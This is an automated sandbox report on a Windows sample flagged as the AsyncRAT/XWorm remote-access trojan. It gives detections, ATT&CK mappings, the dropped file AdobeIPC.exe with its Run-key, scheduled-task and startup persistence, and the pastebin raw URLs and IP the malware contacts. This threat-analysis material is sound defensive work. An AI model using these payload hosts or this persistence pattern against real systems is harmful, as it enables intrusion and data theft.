Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\ProgramData\AdobeIPC	Queries volume information: C:\ProgramData\AdobeIPC VolumeInformation
Source: C:\ProgramData\AdobeIPC.exe	Queries volume information: C:\ProgramData\AdobeIPC.exe VolumeInformation
Source: C:\ProgramData\AdobeIPC.exe	Queries volume information: C:\ProgramData\AdobeIPC.exe VolumeInformation
Source: C:\ProgramData\AdobeIPC	Queries volume information: C:\ProgramData\AdobeIPC VolumeInformation

Source: C:\Users\user\Desktop\jcMcDQ11pZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR

Source: AdobeIPC.exe, 00000002.00000002.3041713254.000000001CA56000.00000004.00000020.00020000.00000000.sdmp, AdobeIPC.exe, 00000002.00000002.2956849178.0000000001140000.00000004.00000020.00020000.00000000.sdmp, AdobeIPC.exe, 00000002.00000002.3026731845.000000001B8C0000.00000004.00000020.00020000.00000000.sdmp, AdobeIPC.exe, 00000002.00000002.3026731845.000000001B95F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\AdobeIPC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.AdobeIPC.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jcMcDQ11pZ.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\AdobeIPC, type: DROPPED
Source: Yara match	File source: C:\ProgramData\AdobeIPC.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a447e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.jcMcDQ11pZ.exe.2a341a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.AdobeIPC.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1714234137.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1711447769.0000000000AF2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jcMcDQ11pZ.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AdobeIPC.exe PID: 7364, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\AdobeIPC, type: DROPPED
Source: Yara match	File source: C:\ProgramData\AdobeIPC.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	2 Scheduled Task/Job	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	11 Obfuscated Files or Information	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jcMcDQ11pZ.exe	71%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
jcMcDQ11pZ.exe	75%	Virustotal		Browse
jcMcDQ11pZ.exe	100%	Avira	TR/Dropper.Gen
jcMcDQ11pZ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\AdobeIPC	100%	Avira	TR/Spy.Gen
C:\ProgramData\AdobeIPC.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\AdobeIPC	100%	Joe Sandbox ML
C:\ProgramData\AdobeIPC.exe	100%	Joe Sandbox ML
C:\ProgramData\AdobeIPC	88%	ReversingLabs	ByteCode-MSIL.Backdoor.XWormRAT
C:\ProgramData\AdobeIPC	66%	Virustotal		Browse
C:\ProgramData\AdobeIPC.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.XWormRAT
C:\ProgramData\AdobeIPC.exe	66%	Virustotal		Browse
C:\ProgramData\Guna.UI2.dll	0%	ReversingLabs
C:\ProgramData\Guna.UI2.dll	2%	Virustotal		Browse
C:\ProgramData\Stellar Generator.exe	54%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\Stellar Generator.exe	35%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
pastebin.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://gunaui.com/api/licensing.phpLR	0%	Virustotal		Browse
https://pastebin.com/raw/LSuWhARfChttps://pastebin.com/raw/j4XYdsdHChttps://paste.fo/raw/9fc49c53951	1%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
https://gunaframework.com/api/licensing.phpLR	0%	Virustotal		Browse
https://gunaui.com/pricing	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://gunaui.com/pricingLR	0%	Virustotal		Browse
https://pastebin.com/raw/LsuynkUz	1%	Virustotal		Browse
https://gunaui.com/LR	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://pastebin.com	0%	Virustotal		Browse
https://gunaui.com/api/licensing.php	0%	Virustotal		Browse
https://gunaframework.com/api/licensing.php	1%	Virustotal		Browse
https://gunaui.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pastebin.com	172.67.19.24	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/LsuynkUz	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com/raw/LSuWhARfChttps://pastebin.com/raw/j4XYdsdHChttps://paste.fo/raw/9fc49c53951	Stellar Generator.exe, 00000001.00000000.1709947841.0000000000922000.00000002.00000001.01000000.00000006.sdmp, Stellar Generator.exe.0.dr	false	1%, Virustotal, Browse	unknown
https://contoso.com/License	powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://gunaframework.com/api/licensing.phpLR	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gunaui.com/api/licensing.phpLR	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.goodfont.co.kr	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.microsoft.Q	powershell.exe, 00000004.00000002.1834495488.0000027F7B862000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://gunaui.com/pricingLR	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/	powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1827533544.0000027F73003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1920848773.00000299B4783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2045023825.0000020C10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AdobeIPC.exe, 00000002.00000002.2964085942.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1803790021.0000027F62F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E291001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gunaui.com/pricing	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1827533544.0000027F73003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1920848773.00000299B4783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2045023825.0000020C10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.1803790021.0000027F631B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.2235942487.000001E2A1071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://www.carterandcone.coml	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gunaui.com/LR	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://gunaframework.com/api/licensing.php	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.1803790021.0000027F631B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E29122B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Stellar Generator.exe, 00000001.00000002.3019731472.0000000007342000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gunaui.com/api/licensing.php	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1803790021.0000027F62F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1860426064.00000299A4711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1965120233.0000020C00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2106648780.000001E291001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gunaui.com/	Stellar Generator.exe, 00000001.00000002.2967726546.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://pastebin.com	AdobeIPC.exe, 00000002.00000002.2964085942.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.161.193.99	unknown	Russian Federation		198134	BITREE-ASRU	false
172.67.19.24	pastebin.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532622
Start date and time:	2024-10-13 19:06:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jcMcDQ11pZ.exe renamed because original name is a hash value
Original Sample Name:	cc92146cb6e5e514c4bae54ced9f4bf6724b6b8b370f2f6d219aa5b0f95390ba.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@24/28@1/2
EGA Information:	Successful, ratio: 18.2%
HCA Information:	Successful, ratio: 98% Number of executed functions: 209 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target AdobeIPC, PID 7632 because it is empty
Execution Graph export aborted for target AdobeIPC, PID 7976 because it is empty
Execution Graph export aborted for target AdobeIPC.exe, PID 1436 because it is empty
Execution Graph export aborted for target AdobeIPC.exe, PID 2424 because it is empty
Execution Graph export aborted for target jcMcDQ11pZ.exe, PID 7284 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3980 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5288 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7560 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7860 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:07:05	API Interceptor	61x Sleep call for process: powershell.exe modified
13:07:59	API Interceptor	105716x Sleep call for process: AdobeIPC.exe modified
18:08:00	Task Scheduler	Run new task: AdobeIPC path: C:\ProgramData\AdobeIPC
18:08:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeIPC C:\ProgramData\AdobeIPC
18:08:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeIPC C:\ProgramData\AdobeIPC
18:08:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AdobeIPC.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.161.193.99	Yq5Gp2g2vB.exe	Get hash	malicious	RedLine	Browse	okmaq-24505.portmap.host:24505/
	JnBNepHH7K.exe	Get hash	malicious	AsyncRAT RedLine	Browse	exara32-64703.portmap.host:64703/
	99SKW728vf.exe	Get hash	malicious	RedLine	Browse	lottie9nwtina-55339.portmap.host:55339/
	amazoninvoiceAF0388d83739dee83479171dbcf.exe	Get hash	malicious	RedLine	Browse	tete2792-22120.portmap.host:22120//
172.67.19.24	envifa.vbs	Get hash	malicious	Unknown	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
